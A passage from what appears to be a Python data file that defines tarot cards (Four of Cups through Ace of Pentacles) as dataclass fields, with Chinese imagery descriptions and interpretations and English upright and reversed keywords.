desc='圣杯四暗示要留意目前感情上的机会。\n\n圣杯四在告诉我们,应该睁开我们的双眼,在那些机会自眼前溜走之前好好的把握住它们。当你内心感到越充实时,你对外在的需求则越少。你越深思熟虑或将焦点放到内心,你就需要越稳定的基础(或与土地有更强的连结)来平衡你自己。\n\n这张牌带有一种沉闷及不悦的感觉,可能是求问者的生活日日如是,一成不变。其实生活未如想像般单调乏味的,只要求问者肯开阔视野,有些意料不到的事情便会发生。', upright='Apathy, Contemplation, Disconnectedness, Feeling disconnected, Melancholy, Boredom, Indifference, Discontent', reversed='Sudden awareness, Choosing happiness, Acceptance, Clarity, Awareness, Depression, Negativity' ), init=False) five_of_cups: TarotCard = field(default=TarotCard( id=40, index='five_of_cups', type='minor_arcana', orig_name='Five of Cups', name='圣杯五', intro='在灰暗的天空底下,有一个人身着黑色斗篷,低头哀悼地上三个倾倒的杯子,里头五颜六色的酒流了出来。他的前方是一条河,象征悲伤之流,但河上有座象征意识与决心的桥,通往远处的房子。灰暗的天色反映牌中人的沮丧的内心世界。从图面上无法分辨出这人是男是女,显示悲伤的情绪无论男女皆能体验。', words='悲观', 
desc='圣杯五代表在痛苦中回转身,寻找新的机会。\n\n圣杯五形容失落和悲伤。它可能是张代表分离的牌,或者有种和人生疏离的感觉。这段期间内,那些平稳而熟悉的事物似乎都逃离你了。在新机会现身前,你必须经历这段失落或孤立期。这张牌和所有的“五”(包括隐士牌)一样,在正立时都代表心胸窄狭,而倒立时,则有心胸宽大的意味。', upright='Loss, Grief, Self-pity, Disappointment, Sadness, Mourning, Discontent, Feeling let down', reversed='Acceptance, Moving on, Finding peace, Contentment, Seeing positives' ), init=False) six_of_cups: TarotCard = field(default=TarotCard( id=41, index='six_of_cups', type='minor_arcana', orig_name='Six of Cups', name='圣杯六', intro='在一座宁静安详的庄园里,有六个盛装星币花朵的圣杯。一个小男孩捧着圣杯,似乎在嗅着花香,又好像把圣杯献给小女孩。背景充斥代表快乐的鲜黄色,而天气晴和。让人彷佛有置身童话世界的感受。', words='安全', desc='圣杯六代表童真环境下的保障和安全。\n\n圣杯六描绘的是一种温柔而隐秘的情景,其中有某种程度的保障和安全,它带有一种可预知性。保障和安全倍受珍惜,不过这是以极高的代价换来的。因为没有什么冒险,所以通常没什么成长。\n\n圣杯六暗示以成长为代价而得到保障、安全和亲密。它可以意指你的居家或家庭状态的稳定。也可能是过去的事物或人们又出现了,等着你去处理。他也可以代表一种舒适的状态,让你有时间静下来,重新关注活力或安顿下来。', upright='Familiarity, Happy memories, Healing, Nostalgia, Memories, Comfort, Sentimentality, Pleasure', reversed='Moving forward, Leaving home, Independence, Stuck in past' ), init=False) seven_of_cups: TarotCard = field(default=TarotCard( id=42, index='seven_of_cups', type='minor_arcana', orig_name='Seven of Cups', name='圣杯七', intro='七个圣杯飘浮在云雾弥漫的半空中,杯中分别装着城堡(象征冒险)、珠宝(财富)、桂冠(胜利)、龙(恐惧,另一说是诱惑)、人头、盖着布发光的人(自己)以及蛇(智慧,另一说是嫉妒)。请注意桂冠的下方有颗不显眼的骷髅头,成功与死亡并存,似乎在给人什么警惕。有个人面对着这些圣杯,不知该如何选择,他的身体姿态似乎流露出些微恐惧。', words='梦想', desc='圣杯七代表应该认知你内在需求。\n\n圣杯七代表的是生活中的非现实层面,包括我们的梦境、幻想与白日梦,或是偶而异想天开的点子。这种想像通常只是空中楼阁,一般人不会真的把这些幻想付诸行动,因此圣杯七不是一张代表行动的牌,而只是一种个人想像的心理状态而已。这张牌描述的是:该去想想什么是你生活重要的部分。它显示出检视环境来确认你正走在通往满足之路的过程中。圣杯七意味着深思内在生活,已进行精神或情感的回顾。\n\n圣杯七是一张代表自我发现、心灵成长以及认识内在需求的牌。提醒你,充分了解自己与自己的行动,你需要行动,也需要思考。对行动有所思考能帮助你将直接的经验转变为知识,并更向智慧与理解靠近。没有思考,行动很快就会变得重复,而没有行动与经验,思考则可能变的索然无味,且毫无意义。这张圣杯七代表你需要向内探索自己,以追求所有爱的来源。你应该确认你所真正需要的是什么,并发现什么东西足以添满你的感情。', upright='Searching for purpose, Choices, Daydreaming, Illusion, Fantasy, Wishful thinking, Indecision', reversed='Lack of purpose, Diversion, Confusion, Disarray, Distractions, Clarity, Making choices' ), init=False) eight_of_cups: TarotCard = 
field(default=TarotCard( id=43, index='eight_of_cups', type='minor_arcana', orig_name='Eight of Cups', name='圣杯八', intro='身穿红衣红鞋的男子在暮色中,手持长杖,离开他先前辛苦建立的的八个杯子,越过河川,转身而去。四周沼泽密布,象征淤塞的情感,如同一滩死水。', words='突破', desc='圣杯八意味你已经突破某种状况,并显示你要追寻更多的东西。\n\n这张牌代表为了追寻一种新的满足,而放弃既有的满足方式。或许你正打算离职去找一个更有价值的工作,或者你正从你的爱的关系中撤退去寻找更深层的幸福。\n\n圣杯八意味着你正超越某人,或突破某特定状况。它表示一个人光理解还不够,还包括离开一种稳定的状态(圣杯六),去发现圣杯十所提供的满足感。没有任何人事物强迫你放弃目前的状态,除了你内心想达到更强烈满足的需求。要圆满的挑战成功,需要内在的力量,当八出现时,你就会拥有相对的勇气和力量。在大阿尔克纳牌中,第八张是力量牌。而所有塔罗牌的八也都和力量有关。', upright='Walking away, Disillusionment, Leaving behind, Abandonment, Letting go, Searching for truth', reversed='Avoidance, Fear of change, Fear of loss, Stagnation, Monotony, Accepting less, Staying in bad situation' ), init=False) nine_of_cups: TarotCard = field(default=TarotCard( id=44, index='nine_of_cups', type='minor_arcana', orig_name='Nine of Cups', name='圣杯九', intro='一个财主装扮的的男子坐在小凳上,双手抱胸,神情怡然自得。他身后的高桌上,覆盖蓝色桌布,九个圣杯排排站。背景则是一片光明的鲜黄色。', words='满足', desc='圣杯九意味对自己的满意和荣耀感。\n\n圣杯九的昵称叫做美梦成真,代表当事人的愿望极有可能实现,无论是精神或是物质方面。这张牌表示你了解自己真正的价值,而且就是你的价值造就了今天的你。\n\n圣杯九形容一种对能圆满达成工作而感到的骄傲和满足。你内心所拥有幸福和喜悦的感觉,可能是来自于你的工作环境、人际关系,或是来自一种心灵上的成就感。现在你内在的需求已经得到满足了,而你也能思考你所赢得的成功。在这张九牌当中有着从你对自己的爱里头所滋长出来的快乐、满足和平静。', upright='Satisfaction, Emotional stability, Luxury, Wishes coming true, Contentment, Success, Achievements, Recognition, Pleasure', reversed='Lack of inner joy, Smugness, Dissatisfaction, Unhappiness, Lack of fulfilment, Disappointment, Underachievement, Arrogance, Snobbery' ), init=False) ten_of_cups: TarotCard = field(default=TarotCard( id=45, index='ten_of_cups', type='minor_arcana', orig_name='Ten of Cups', name='圣杯十', intro='在卡面中我们看到一家四口和乐融融,父母亲搂抱对方,各举一只手迎向圣杯彩虹,两个孩子快乐的手牵手跳舞,背景是清翠的树木河流,和一栋房屋。', words='家庭', desc='圣杯十意味一个互利的团体或家庭状态。\n\n圣杯十是一张表示欢乐和分享的牌。它通常是在描述一个团队或家庭,他们在身体及精神上都能相互奉献及合作,并且共享所有的利益。圣杯十形容一个家庭或团体,而其中的每个人均能受益。因为每个人都坦然的付出和接受,因而团体的气氛和谐,大家也乐于付出。它暗示对家庭或工作环境(包括团队合作和分享)有所付出。这张是意味一个成功的家庭状态或聚合,其中每位参与者都充分的感受到对这个团体的归属感。', upright='Inner happiness, Fulfillment, Dreams coming true, Happiness, 
Homecomings, Emotional stability, Security, Domestic harmony', reversed='Shattered dreams, Broken family, Domestic disharmony, Unhappy home, Separation, Domestic conflict, Disharmony, Isolation​' ), init=False) page_of_cups: TarotCard = field(default=TarotCard( id=46, index='page_of_cups', type='minor_arcana', orig_name='Page of Cups', name='圣杯侍从', intro='圣杯侍从穿着花朵图案的衣服,身体很轻松地站着,左手叉腰,面带微笑,用好奇的眼光,没有任何压力地看着圣杯中蹦出的一条鱼。', words='奉献', desc='圣杯侍从意味有益于情感的奉献。\n\n圣杯侍从是想像力最丰富的孩子。他天真无邪,敏感细心,直觉性强,爱好幻想,好奇心重,甜美可人,喜欢作梦,常常问一些让人想都想不到的问题。他很随和,合作性高,可靠,关心别人的威受,也乐意为他人服务。这样的性格形成一位善解人意、敏感,多愁善感,强调感情交流互动的人。他认真对待他人,对於所爱的人更是忠诚。他也是一位勤勉好学和专心致志的人,自动自发地提供服务朝向特定目标努力,他热心助人,是值得信赖的好帮手,更是良好的工作伙伴。\n\n塔罗牌中的侍从牌都和学习有关,而且由于圣杯组牌涉及情感和直觉,所以这张牌可能意味着透过冥想,或其他任何类似的被动方式来进行心灵上的学习或发展。圣杯侍从代表一段新关系或圣以合伙关系的到来。一个让情感得到满足的机会。', upright='Happy surprise, Dreamer, Sensitivity, Idealism, Naivete, Innocence, Inner child, Head in the clouds', reversed='Emotional immaturity, Insecurity, Disappointment, Emotional vulnerability, Immaturity, Neglecting inner child, Escapism' ), init=False) knight_of_cups: TarotCard = field(default=TarotCard( id=47, index='knight_of_cups', type='minor_arcana', orig_name='Knight of Cups', name='圣杯骑士', intro='不同于权杖骑士或宝剑骑士的迅捷骑马姿态,圣杯骑士的白马很有绅士风度,优雅地行进,跟主人一样。圣杯骑士平举着圣杯,他的眼光有些梦幻,深深注视着圣杯。', words='选择', desc='圣杯骑士意味在感情和行动之间做出决定。\n\n圣杯骑士暗示来自某人的供给。它可能是指情感上的奉献,或某种更为实际的事物。它可能是指情感上的付出,或某种更为实际的事物。骑士也意味着一段决定是否等待或行动,让事情充分发展或找寻新机会的时期。为了发现满足,或许现在是随着心意(河流的象征)而为的时候了。', upright='Following the heart, Idealist, Romantic, Charming, Artistic, Graceful, Tactful, Diplomatic, Mediator, Negotiator', reversed='Moodiness, Disappointment, Tantrums, Turmoil, Avoiding conflict, Vanity' ), init=False) queen_of_cups: TarotCard = field(default=TarotCard( id=48, index='queen_of_cups', type='minor_arcana', orig_name='Queen of Cups', name='圣杯皇后', intro='圣杯皇后双手捧着圣杯,眼神直直的注视着圣杯。那圣杯是教堂形状,两臂各有一位天使,顶端是十字架,象征圣杯皇后的虔诚。她坐在海边的宝座上,宝座基部有个小美人鱼抓鱼的图案,顶部是两个小美人鱼共同抱着一个大蚌壳。', words='倾听', 
desc='圣杯皇后意味透过倾听直觉而成功。\n\n圣杯皇后意味透过倾听感觉,以及利用富创意的想象力而获得成功。她从经验得知,杂乱无章的想象所产生的结果通常是有限的,因此它可以将精力用在对身体、情感、精神及心灵上都相当有价值的行动上。虽然她可能显得温柔又细心,但眼神却意味着一种坚强的意志。爱调和她的意志,并增加个性上的深度。她带着爱心和怜悯行事,而且常常展现出浓浓的家庭感情。如果发生问题,她可能不会说出她的感觉,但仍然会对周遭的人给于支持,把自己的感情的困扰放在一边。', upright='Compassion, Calm, Comfort, Warmth, Kindness, Intuition, Healer, Counsellor, Supportive', reversed='Martyrdom, Insecurity, Dependence, Giving too much, Overly-sensitive, Needy, Fragile' ), init=False) king_of_cups: TarotCard = field(default=TarotCard( id=49, index='king_of_cups', type='minor_arcana', orig_name='King of Cups', name='圣杯国王', intro='国王坐在波涛汹涌海中央的宝座上,左边有条鱼跳出海面,右边有一艘帆船。他的内袍是代表水要素的蓝色,胸前还挂著鱼形项链。他左手拿著象征权力的杖,右手持圣杯,他却是圣杯家族中唯一不注视圣杯的人。', words='创作', desc='圣杯国王暗示透过创造和情感上的训练而成功。\n\n圣杯国王展现深度和理解力,他适合一个以满足他人的需求为主的位置。他感情已经成熟到能够清楚的考虑别人和自己的需求,而且常常以家庭及环境中的共同参与感为荣。\n\n圣杯国王暗示透过情感和创作上的训练而成功,经由落实精力在有创作的目标上,可以达到所追寻的成功。一种成熟、有创意的方法带来琛功,尤其是在创造和艺术的努力上。这张国王牌暗示你应该信赖你本能——别放弃。它暗示一种坚强又冷静的方式。想象加灵感,再加上实际的努力就会得到回报。', upright='Compassion, Control, Balance, Wise, Diplomatic, Balance between head and heart, Devoted, Advisor, Counsellor', reversed='Coldness, Moodiness, Bad advice, Overwhelmed, Anxious, Cold, Repressed, Withdrawn, Manipulative, Selfish' ), init=False) ace_of_swords: TarotCard = field(default=TarotCard( id=50, index='ace_of_swords', type='minor_arcana', orig_name='Ace of Swords', name='宝剑首牌', intro='一只手从云中伸出,紧紧握住宝剑,宝剑穿过皇冠与桂冠,而远方是毫无绿意的尖锐山头,以及灰白空旷的天际。', words='思想', desc='宝剑首牌代表毅然决然的行动,开始计划一项新的冒险。\n\n宝剑首牌代表的是一个开始,时涉及以相信冒险或方案的行动。权杖首牌描述身体上的行动,杯子牌的首牌则是情感上的行动,而这张首牌叙述一个意念的形成,或是为未来的行动所准备的计划。这张牌代表清晰的思考,或明确的了解到完成一项计划所需要的是什么。\n\n同时这把双面的宝剑强调着现实、成就与成功所必须负担的责任和应得的报酬。宝剑一只是一个开端,一种可能。未来究竟要如何发展,掌握在持剑者的手中。', upright='Breakthrough, Clarity, Sharp mind, New idea, Concentration, Vision, Force, Focus, Truth', reversed='Confusion, Brutality, Chaos, Miscommunication, Hostility, Arguments, Destruction' ), init=False) two_of_swords: TarotCard = field(default=TarotCard( id=51, index='two_of_swords', type='minor_arcana', orig_name='Two of Swords', name='宝剑二', 
intro='身穿浅灰长袍的女人坐在灰石凳上,背对着澎湃汹涌、暗礁满布的海洋。她眼蒙白布,双手持剑,在胸前交叉不动。天际高挂一轮新月。', words='抉择', desc='宝剑二意味着做出一个决断,无论对与错,不要试图逃避。\n\n宝剑意味为你需要作决定或在两个选择当中择其一。这是二则一的抉择,或许在目前这个阶段,你对于所做的选择会产生怎样的结果,洞察力还不够。你在做决定的时候,并没有对你的环境做通盘的考虑,或者是,你没有考虑到你的抉择会带来怎样的结果。\n\n正视你所恐惧的,如此你才能明了你周遭事物对你有什么意义。一个正确决定的报偿正等着你,它的第一个回报是解脱感,这解脱感来自于你能够锁定一个方向。', upright='Difficult choices, Indecision, Stalemate, Stuck in the middle, Denial, Hidden information', reversed='Lesser of two evils, No right choice, Confusion, Indecision, Hesitancy, Anxiety, Too much information, Truth revealed' ), init=False) three_of_swords: TarotCard = field(default=TarotCard( id=52, index='three_of_swords', type='minor_arcana', orig_name='Three of Swords', name='宝剑三', intro='映入眼帘的是一幅令人痛苦的画面。即使是完全没有接触过塔罗牌的朋友,也可以轻易道出宝剑三的涵义──伤心。三把剑合力刺进一颗鲜红的心,背景是灰暗的雨和云。某些版本的塔罗牌给这张牌一个更直接的名称,叫做“悲伤”。', words='悲伤', desc='宝剑三意味着伤心在所难免,请接受你的痛苦和悲伤。\n\n宝剑三代表的是,你正强烈的经验这悲伤和失落的一段时间。当出现这张牌时,内心的困惑、悲痛和沉重是很明显的,它表示强烈的失望。但你要知道:去体验你的悲伤是很重要的,因为在这么做的同时,你也扫除了障碍,让即将到来的机会可以接近你。记住,悲伤是会过去的。\n\n虽然痛苦,但我们要看破痛苦的假象。宝剑三凌空的心,告诉我们需要再去深入思考,以获得解脱和更深的觉醒,三把宝剑只是一种试炼,这颗心也可以是一种假托,而不是我们真正的心灵。以承受和接纳的态度,来化解宝剑成为优美的思考认知。', upright='Heartbreak, Suffering, Grief, Separation, Sadness, Sorrow, Upset, Loss, Trauma, Tears', reversed='Recovery, Forgiveness, Moving on. 
healing, Reconciliation, Repressing emotions' ), init=False) four_of_swords: TarotCard = field(default=TarotCard( id=53, index='four_of_swords', type='minor_arcana', orig_name='Four of Swords', name='宝剑四', intro='图中的男人在类似修道院的建筑物内休息,双手合抱胸前,呈现安详的状态。彩绘玻璃表现一个祈祷者跪在圣母面前的画面,好像在寻求什么建议,以获得内心的宁静。三把宝剑挂在墙上不用,但他身旁仍保有一把宝剑,当他醒来,随时可以拿起宝剑来采取行动。', words='沉思', desc='宝剑四暗示在危机中安静的思考,退隐中的深思熟虑。\n\n\n宝剑四这张牌可能象征自生活中撤离:身体上退隐到自家当中,或在精神上退隐到梦想和幻想当中。这是一张反省过去行为和计划未来的牌。他说明精神层面的巩固:采取让过去行为有意义的行动,以及排除那些已经被证实为不正确、或没有建设性的想法和信念。如此一来就有可能运用过去的经验来帮助你获得未来的成功。在经历了宝剑三的痛苦之后,随之而来的是对你自己和你的人生有更深层的了解。', upright='Rest, Restoration, Contemplation, Relaxation, Peace, Sanctuary, Recuperation, Self-protection, Rejuvenation', reversed='Restlessness, Burnout, Stress, Recovery, Awakening, Re-entering world, Release from isolation' ), init=False) five_of_swords: TarotCard = field(default=TarotCard( id=54, index='five_of_swords', type='minor_arcana', orig_name='Five of Swords', name='宝剑五', intro='红发的男子右手抱着两把剑,左手拄着另一把,回头注视远方两个失败者,嘴角似乎带着微笑。很明显的,他们刚结束一场争执,也许暴力相向。地上还散落着两把剑。另外两人中,一人怅然离去,一人用手摀着脸,似乎难以接受,或者感到伤心羞辱。天空中被风吹散的云彷佛也在说着他们争执的故事,看来很不宁静。', words='纷争', desc='宝剑五意味误会加深,争吵和紧张,解决的机会十分渺茫。\n\n宝剑五这张牌代表争吵、紧张和冲突,这可能使指你与自己内在的交战,或和你周遭人的不协调。假如这个冲突是指你和别人的,则其前提很有可能来自你的思想。在这种冲突的情况下,每个人对于事情的解决方法都各有见地,却没有人愿意聆听他人的心声。', upright='Unbridled ambition, Win at all costs, Sneakiness, Arguments, Disputes, Aggression, Bullying, Intimidation, Conflict, Hostility, Stress', reversed='Lingering resentment, Desire to reconcile, Forgiveness, Reconciliation, Resolution, Compromise, Revenge, Regret, Remorse, Cutting losses' ), init=False) six_of_swords: TarotCard = field(default=TarotCard( id=55, index='six_of_swords', type='minor_arcana', orig_name='Six of Swords', name='宝剑六', intro='一艘小船上插着六把宝剑,船上有一个女人、一个小孩与一位船夫。\n\n船缓缓的朝远方的岸边前进,而此端的水汹涌,彼方的水平静。象征伤害的六把剑插在船身上,以及三个主角哀伤的背影,构成宝剑六缓慢低回的基调。沉重的剑身让船夫只能缓行,疗伤的过程亦同。但是我们不能把宝剑抽起,否则船会沉,正如我们不能把过去的哀伤连根拔起,只能轻轻的抚平。也许你该庆幸,这些宝剑并不能使船沉没。', words='平静', 
desc='宝剑六暗示远离是非,在混乱之后,逐渐回复平静。\n\n这是受伤后康复的过程,不管伤多重,总是能痊愈。水象征情绪,这端汹涌的水是你烦扰的过去,前方大片平静的水面,预示未来安详的情绪。船夫手持黑色长篙,黑色象征潜质,将来什么都还是可能发生,不要将自己困死了。宝剑六是一个信道,领你向未来的幸福快乐前进,光明的日子就在前方。\n\n这张牌暗示你正带着你的剑(问题),从过去走向未来。或许你根本没注意到它们,然而它们却是与你紧紧相随。这是一个从艰困时刻过渡到一个较为平衡状态的过程。即使现时的问题及困难如何复杂,最终都会得到解决,求问者届时心情自然轻松不少。宝剑六可能是在说明当你转移向新的经验时,你也正慢慢的远离困境,情绪从过去释放出来。', upright='Transition, Leaving behind, Moving on, Departure, Distance, Accepting lessons', reversed='Emotional baggage, Unresolved issues, Resisting transition, Stuck in past, Returning to trouble, Running away from problems, Trapped' ), init=False) seven_of_swords: TarotCard = field(default=TarotCard( id=56, index='seven_of_swords', type='minor_arcana', orig_name='Seven of Swords', name='宝剑七', intro='图中的男子身处军营中,趁着远方敌人炊饭没有防备时,悄悄偷走五把剑,还留着两把在原处。', words='逃避', desc='宝剑七意味另辟蹊径,若要成功的话,需要一种新的方法。\n\n宝剑七所传达的讯息是:不要放弃。去找寻另一种可以达成目标的方法吧。坐下来,检查一下你所有的选择,以便发现先前未曾预见的可能性。你当然还有时间来完成你的愿望,然而在方法上需要更有弹性,各种行动的不同组合方式,就有可能会带来不同的结果。\n\n宝剑七暗示经由审慎评估各种可能,你就能找到有效的解决之道。透过详细的规划和不放弃的决心,你就能得到更多。比如你目前正汲汲营营于某件重要的事,理智所提供的解决方案会让你不需要如此费劲。\n\n宝剑七同时也是一张秘密、隐藏动机和不坦诚的牌。牌中暗示求问者欲逃避一段令他不愉快的事情,这件事可能会令他有金钱损失或与面子有关,求问者若肯勇敢面对,并应用智慧及交际手段去补救。', upright='Deception, Trickery, Tactics and strategy, Lies, Scheming, Strategy, Resourcefulness, Sneakiness, Cunning', reversed='Coming clean, Rethinking approach, Deception, Confession, Conscience, Regret, Maliciousness, Truth revealed' ), init=False) eight_of_swords: TarotCard = field(default=TarotCard( id=57, index='eight_of_swords', type='minor_arcana', orig_name='Eight of Swords', name='宝剑八', intro='一个女人眼睛被布蒙住,上半身被捆绑着,身处八把宝剑群中。地上满是象征羞辱的泥泞,而远方是座矗立于峭壁之上的城堡,象征绑住她的权威。', words='限制', 
desc='宝剑八暗示限制及丧失个人的能力。\n\n宝剑八代表的是你被限制住的一段时间,或是在某种情况下你失去个人的能力。你觉得动弹不得,受到限制,而且没有办法看清楚你前面的路。\n\n塔罗牌的“八”是代表力量的牌。而对于宝剑八里面的女人,这份力量源自于倾听她内在的声音的能力。双眼被蒙蔽让她无法透过视觉来做判断,她显得那么的无能为力,然而第一眼看上去这是个阻碍,但其实却是助力。阻碍那个女人控制自己所处环境的力量,却使得她能够走进自己的内心世界倾听内在的声音,并且留心它所发出的指令。如果你想做出有效率的决定,现在是留心你的自我精神层次的时候了。\n\n去探索那等待着你的道路吧,利用你内在的力量和个人的能力,将自己从目前的情况中释放出来,并且把那些曾经屈服于他人的个人能量重新召唤回来。你的信念其实才是你最大的限制。好好自省并检视这些信念,因为事实上目前的“眼罩”是在帮助你,因为它可以让你不会分心。', upright='Imprisonment, Entrapment, Self-victimization, Trapped, Restricted, Victimised, Paralysed, Helpless, Powerless', reversed='Self acceptance, New perspective, Freedom, Release, Taking control, Survivor, Facing fears, Empowered, Surrender' ), init=False) nine_of_swords: TarotCard = field(default=TarotCard( id=58, index='nine_of_swords', type='minor_arcana', orig_name='Nine of Swords', name='宝剑九', intro='午夜梦回,一个女子从睡梦中惊醒,把脸埋在双手中。墙上横挂着九把剑,看起来彷佛从后面刺穿那女子,带给人极大的压迫感。棉被图案是由象征热情的玫瑰,以及星座符号组成的。床侧则雕刻着一人击败另一人的画面。', words='梦魇', desc='宝剑九暗示由梦境传达的直觉,或对问题的担心。\n\n宝剑九代表的是强烈的梦。或许你的潜意识正努力教导你某些事情,去倾听你的梦境。宝剑九是一张代表担心和情绪骚动的牌。这种担心可能是对自己或周遭的一切。也可以代表鲜明的梦境或梦魇,而梦魇则可能是在传达一种强烈的讯息,即你生命当中某些不对劲的事物,已由潜意识而浮现在你的意识层面了。\n\n假设你将你的梦境写成日志,或许会发现一个共同的线索或是明显的讯息。那么你的梦就可以变成一项接近你潜意识的有效工具了。', upright='Anxiety, Hopelessness, Trauma, Fear, Negativity, Breaking point, Despair, Nightmares, Isolation', reversed='Hope, Reaching out, Despair, Recovery, Learning to cope, Facing life, Finding help, Shame, Guilt, Mental health issues' ), init=False) ten_of_swords: TarotCard = field(default=TarotCard( id=59, index='ten_of_swords', type='minor_arcana', orig_name='Ten of Swords', name='宝剑十', intro='一个俯卧的男人,背上插着十把剑,有一把甚至从插进耳朵里去。这画面实在令人怵目惊心。牌面中有一半被黑色的天空和乌云所占去,多少暗示宝剑十这张牌是大家避之唯恐不及的所谓的“坏牌”。', words='失败', desc='宝剑十意味着痛苦挥之不去,在另一个开始之前某种状况的结束。\n\n这张牌暗示在某种情况下,你已到了最低潮的时刻,你也可能是被一些无用的事物,或对生命具破坏性的信念给绊住了。但远方微弱的阳光暗示着,尾随这艰困时刻的将会是新的以及更好的事物。你对人生的思想或信念导致你此刻的境遇,从这里,你的思想将会带领你到任何你认为能够去的地方。\n\n宝剑十代表一种情况的结束。可能指两性关系的结束,或某关系中的一个阶段的结束,或一项事业的失败。你生命中的某些事物已经结束了,虽然这毫无疑问的会是一段艰难的时期,不过好消息是,它终究会过去,接受这个事实有助于新事物来取代旧的的。', upright='Failure, Collapse, Defeat, Ruin, 
Bitterness, Exhaustion, Dead end, Victimization, Betrayal', reversed="Can't get worse, Only upwards, Inevitable end, Survival, Improvement, Healing, Lessons learned, Despair, Relapse" ), init=False) page_of_swords: TarotCard = field(default=TarotCard( id=60, index='page_of_swords', type='minor_arcana', orig_name='Page of Swords', name='宝剑侍从', intro='宝剑侍从两手握著宝剑,眼光却朝著远方。他的头发和背景中的树都被风吹得飞扬。远方天空中有十只小鸟成群飞舞。背景灰云带来些许混乱的气氛', words='幻想', desc='宝剑侍从象征太多的梦想,而行动却不够。\n\n你可以发现到这个侍从双脚离地甚远,这个思考敏捷的年轻人喜欢说话、有很多点子和创新的概念,而这些成双出现的点子却无法搭在一起。这表示一种生活的态度,这种态度要求你透过梦境和思想让自己从现实抽离出来。\n\n宝剑侍从可能代表有关你目前所拥有的一个构想或计划的消息。但却没有付诸行动。对那些依赖创意和思考维生的人而言,这可说是一张正面的牌,但是也可能暗示脚踏实地是必要的,假设你想生产实际或有形的东西。', upright='Curiosity, Restlessness, Mental energy, Curious, Witty, Chatty, Communicative, Inspired, Vigilant, Alert, Mental agility', reversed='Deception, Manipulation, All talk, Scatterbrained, Cynical, Sarcastic, Gossipy, Insulting, Rude, Lack of planning' ), init=False) knight_of_swords: TarotCard = field(default=TarotCard( id=61, index='knight_of_swords', type='minor_arcana', orig_name='Knight of Swords', name='宝剑骑士', intro='宝剑骑士和圣杯骑士同样骑着白马,但宝剑骑士这匹马在狂风中极速奔驰,与圣杯骑士平缓前进的马形成强烈对比。宝剑骑士将宝剑高举过头,表情狰狞,向前冲杀。马鞍上饰以蝴蝶和鸟,象征风要素。他穿着铁甲,外袍也有鸟的图案,而靴子前后都带着尖刺,在战场上毫不留情。云和树都被狂风吹得七零八落。空中飞翔的鸟,队形也略显散乱。', words='急躁', desc='宝剑骑士暗示要达成愿望需要有敏捷的行动。\n\n宝剑骑士代表的是迅速的行动:跃进或跳出某种情景。作为某个问题的答案,它暗示着一个快速的动作或出其不意的行为是有需要的。已经没有时间去想该做何选择了——去做就对了。\n\n这张牌通常是代表一个年轻人,他不按牌理出牌、缺少耐心、思考敏捷。这是属于年轻人的力量,他要走往自己的道路。是一种英勇的行径或者说英雄气概的展现。当然这种冲撞的行动,也可能极具破坏力,能造成摧毁的状况。他的意志力坚强,专注而犀利,有着清明的勇气和专一凝聚的心志。', upright='Action, Impulsiveness, Defending beliefs, Assertive, Direct, Impatient, Intellectual, Daring, Focused, Perfectionist, Ambitious', reversed='No direction, Disregard for consequences, Unpredictability, Rude, Tactless, Forceful, Bully, Aggressive, Vicious, Ruthless, Arrogant' ), init=False) queen_of_swords: TarotCard = field(default=TarotCard( id=62, index='queen_of_swords', type='minor_arcana', orig_name='Queen of Swords', name='宝剑皇后', 
intro='宝剑皇后戴著蝴蝶花纹的王冠,象征灵魂,也象征风要素。她穿着灰色内袍,和蓝天灰云花纹的披风。她的表情坚毅,似乎皱著眉头,左手却对世界敞开。她右手高举宝剑,剑尖笔直向上。她的宝座扶手之下有个人头花纹,那是风之精灵,宝座的底部又有蝴蝶花纹。宝剑皇后的头顶上有只高飞的鸟。背景天空是深蓝色的,还有大片的灰云。', words='理智', desc='宝剑皇后代表淡定冷静,经过深思熟虑所得到的成就。\n\n宝剑皇后是一张思索感情的牌。它可能意味运用心智到情感中的行动,好让感觉有意义。作为某个问题的答案,宝剑皇后暗示透过清晰思考而获致成功。\n\n现在正是你反省过去的行为或目前情况的时刻了。密切的观察那些接近你的事物,以确认你不会再重陷困境中。你可能会想从生活当中撤退,好好的思考你自己,以及未来的方向。', upright='Complexity, Perceptiveness, Clear mindedness, Honest, Independent, Principled, Fair, Constructive criticism, Objective, Perceptive', reversed='Cold hearted, Cruel, Bitterness, Pessimistic, Malicious, Manipulative, Harsh, Bitter, Spiteful, Deceitful, Unforgiving' ), init=False) king_of_swords: TarotCard = field(default=TarotCard( id=63, index='king_of_swords', type='minor_arcana', orig_name='King of Swords', name='宝剑国王', intro='宝剑国王是四张国王牌中唯一以正面出现的。他穿著蓝色内袍和红色披风,他的右手持剑,剑尖偏右,偏向行动的那一边。左手戴着象征权力的戒指,轻松的放在腿上。他后方帷幕上饰有象征灵魂和风要素的蝴蝶花纹。天空中的鸟的数量有两只,象征在智慧与行动之间的选择,对宝剑国王而言,智慧必须用行动来实现。', words='公正', desc='宝剑国王暗示将梦想化为现实,用构想去做一些真实的事。\n\n宝剑国王是客观理性,凡事讲求合理和公正,具有坚定而一贯的信念和完整的思想体系,很难被他人所影响。他凭借事实和原则而下决定,不会情感用事或主观成见,并且会考虑得十分周到,显出谨慎和深沉的特色。\n\n宝剑象征着人的思想和决心,这位国王手执宝剑,自然具有着掌握思考的能力,并且很重视理念和原则,在意的是合理与正义。宝剑国王代表对清楚的思想的追求、诚实,以及将只是倒入现实的需求。作为某个问题的答案,这张国王牌可以说是透过清楚而有效之计划而达到成功。', upright='Head over heart, Discipline, Truth, Reason, Authority, Integrity, Morality, Serious, High standards, Strict', reversed='Manipulative, Cruel, Weakness, Irrational, Dictator, Oppressive, Inhumane, Controlling, Cold, Ruthless, Dishonest' ), init=False) ace_of_pentacles: TarotCard = field(default=TarotCard( id=64, index='ace_of_pentacles', type='minor_arcana', orig_name='Ace of Pentacles', name='星币首牌', intro='云中伸出一只手,捧着一枚星币。背景是花草满布的繁盛庭园,绿树拱门外的远方有座白色的山,暗示星币一不只有关物质,也可以延伸到精神层面。', words='物质', desc='星币首牌暗示,你有足够的钱好执行你的计划。\n\n星币首牌是张将梦想化为实质的牌。圣杯牌组中,我们有梦﹔星币牌组中,我们筑梦,梦想不再只是空中楼阁。星币首牌让我们稳健,踏实,有安全感。星币首牌和务实的开始有关。它意味你有足够的金钱、精力,或充分的条件,来开始一项新计划。它暗示你可以平衡掉花费。不论目前花掉了多少钱,赚回来的绝对够本。', upright='Opportunity, Prosperity, New venture, New opportunities, Resources, Abundance, Security, Stability, 
